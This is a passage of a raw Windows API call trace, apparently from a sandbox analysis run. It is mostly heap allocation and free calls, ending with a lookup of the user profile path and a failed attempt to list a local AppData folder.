dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.243] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.244] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.244] FreeLibrary (hLibModule=0x74d40000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.244] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.245] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0208.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.245] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.246] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.247] CloseHandle (hObject=0x2c0) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0208.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0208.248] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0208.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0208.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0208.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0208.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0208.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.254] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0208.255] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0208.255] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0208.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0208.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0208.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0208.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0208.257] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Application Data", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data", lpFilePart=0x8bedfc*="Application Data") returned 0x3c [0208.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0208.257] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data")) returned 0x2416 [0208.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1610011, ftLastAccessTime.dwLowDateTime=0xf9c, ftLastAccessTime.dwHighDateTime=0x3e40031, ftLastWriteTime.dwLowDateTime=0x10a54, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0xf9c, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0208.258] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0208.258] GetLastError () returned 0x6 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0208.258] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0208.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0208.258] RtlAllocateHeap 